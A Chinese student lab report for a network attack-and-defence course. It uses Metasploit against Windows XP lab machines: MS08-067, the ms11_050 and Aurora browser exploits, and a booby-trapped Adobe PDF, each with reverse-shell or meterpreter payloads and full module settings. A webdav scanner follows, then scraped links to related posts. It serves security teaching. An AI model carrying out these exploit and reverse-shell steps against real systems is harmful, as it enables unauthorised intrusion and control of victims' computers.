20155321 《网络攻防》 Exp5 MSF基础应用
20155321 《网络攻防》 Exp5 MSF基础应用
基础问题
- 用自己的话解释什么是exploit,payload,encode
- 关于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作。
- 关于payload,我觉得它是一个载荷,因为恶意代码不是全部都有”危险“,那些”危险“的地方需要通过payload进行实现。它可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行破坏、删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门等操作。
- 关于encode,我觉得它就是一个加密工具。
Windows服务渗透攻击——MS08-067安全漏洞
- 攻击机:kali,IP地址是
192.168.23.140
- 靶机:windows XP SP3(English),IP地址是
192.168.23.142
- 在kali输入
msfconsole
进入控制台后依次输入以下指令:use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
tcp反向回连set LHOST 192.168.23.130
此IP是kali的IPset LPORT 5321
端口set RHOST 192.168.23.142
此IP是靶机WIN XP的IP,特定漏洞端口已经固定set target 0
exploit
进行攻击
- 建立会话,攻击成功结果如下:
针对浏览器的攻击:ms11_050
- 攻击机:kali,IP地址是
192.168.1.198
- 靶机:Windows XP Professional SP3 简体中文,IP地址是
192.168.1.182
- 用
use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块 info
指令查看该模块的信息
- targets信息
- options信息
- 用
set payload windows/meterpreter/reverse_tcp
设置payload
,并设置需要设置的参数
- 用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址
- 但是不知道为什么一直回连不成功,去看了同学的提示换了老师的虚拟机再做一次也还是不行,如下图所示,和用自己的kali虚拟机的显示一致
- 因为实在找了资料试了好几遍都是这样,不知道是为什么,因此就换了另外一个也是针对浏览器的攻击:MS10_002_aurora漏洞攻击
针对浏览器的攻击:MS10_002_aurora漏洞攻击
- 攻击机:kali,IP地址是
192.168.1.183
- 靶机:Windows XP Professional SP3 简体中文,IP地址是
192.168.1.182
- 前面的基本操作与上面那个攻击差不多,在基本设置完成后进行监听并在靶机上输入下图所示生成的IP地址:
- 这次回连就成功啦!可以用
sysinfo
指令和ipconfig
指令看到靶机的相关信息
针对客户端的攻击:adobe_toolbutton
- 攻击机:kali,IP地址是
192.168.1.183
靶机:windows XP SP3(English),IP地址是
192.168.23.142
- 与上面的思路一样,先用
search adobe
得知此漏洞所在的模块
- 选择一个模块并使用该模块,并用
show targets
查看可以被攻击的靶机的操作系统型号
- 设置
payload
攻击载荷,命令set payload windows/meterpreter/reverse_tcp
- 设置相应参数,实施
exploit
攻击
- 打开显示隐藏文件,并在
/root/.msf4/local/
目录下找到5321lrt.pdf文件,如下图所示
- 将pdf文件放到靶机上
在靶机上打开pdf文件,发现已经获取了被攻击者权力,可以对其进行操作
成功应用任何一个辅助模块:webdav_scanner
- 输入命令
show auxiliary
查看所有辅助模块
- 选择其中一个即可
- 用指令
info
查看相关信息
- 进行扫描,结果如下图所示
实验总结与感想
- 通过这次的实验,主要是学会了通过MSF的攻击模块对计算机进行攻击,当然就像老师上课说的,目前我们的攻击都只能是针对XP系统进行攻击,现在的操作系统防护能力已经比以前有了很大的提高,但是我觉得攻击模块给我们提供的方法和信息还是非常值得我们学习的。
20155321 《网络攻防》 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 20145330 《网络攻防》 MSF基础应用
20145330 <网络攻防> MSF基础应用 1.实验后回答问题 (1)用自己的话解释什么是exploit,payload,encode. exploit:进行渗透攻击的模块合集 pay ...
- 《网络攻防》 MSF基础应用
20145224陈颢文 <网络攻防>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode: exploit:攻击手段,是能使攻击武器(payloa ...
- 20145239杜文超《网络攻防》- MSF基础应用
20145239杜文超<网络攻防>- MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit:实现攻击行为的主体,但没有载荷只 ...
- 20145306 《网络攻防》 MSF基础应用
20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145334赵文豪《网络攻防》 MSF基础应用
实践目标 掌握metasploit的基本应用方式 掌握常用的三种攻击方式的思路. 实验要求 一个主动攻击,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adob ...
随机推荐
- Android--解决EditText放到popupWindow中,原有复制、粘贴、全选、选择功能失效问题
1.原来是将EditView放到了popupwindow,发现EditView原有的复制.粘贴.全选.选择功能失效了,所以便用DialogFragment代替了popupWindow 直接上代码 ①. ...
- CentOS 7下安装Python3.5
CentOS 7下安装Python3.5 •安装python3.5可能使用的依赖 yum install openssl-devel bzip2-devel expat-devel gdbm-deve ...
- webpack+sass+vue 入门教程(一)
一.安装node.js node.js是基础,必须先安装.而且最新版的node.js,已经集成了npm. 下载地址 node安装,一路按默认即可. 二.全局安装webpack npm install ...
- 【前端】NodeJs包管理工具NPM
NPM是随同NodeJS一起安装的包管理工具,能解决NodeJS部署上的很多问题. 测试是否安装成功,出现版本提示表示安装成功. npm -v NPM常用命令 官方文档:https://www.npm ...
- 巧用top percent优化top 1
废话不多说,直接上sql B.CREW_ID, E.CREW_NAME,C.OFFBLK,C.ONBLK,dbo.PEK_OPS_Date(A.STD) as STD FROM dbo.FLIGHTS ...
- IP解析计算机名称
#-*- coding: UTF-8 -*- import subprocess,sys,threading reload(sys) sys.setdefaultencoding('utf-8') d ...
- Linux学习---linux下的彩蛋和各种有趣的命令
[原文]https://www.toutiao.com/i6596596897392099844/ screenfetch 一个显示系统信息和主题信息的命令 使用方法 输入screenfetch 效果 ...
- 牢记 31 种 CSS 选择器用法
原文 The 30 CSS Selectors you Must Memorize 由 Jeffrey Way 发表于 2011 年 6 月,介绍了 30 种最常用的 CSS 选择器用法,多加了一种, ...
- Mac如何搭建 配置 virtualenv python虚拟环境(超级详细,适合小白)
首先去python官网 下载python3的 安装包安装: https://www.python.org/ftp/python/3.6.5/python-3.6.5-macosx10.9.pkg 安装 ...
- 网站如何接入第三方登录,微信登录和QQ登录:注册认证篇
第三方登录平台接入 (QQ\微信登录) QQ登录接入 第一步成为QQ应用开发者,审核期限七天 一.所需材料 1.公司注册相关信息 2.营业执照扫描件 微信登录接入 第一步成为微信开发平台开发者,认证费 ...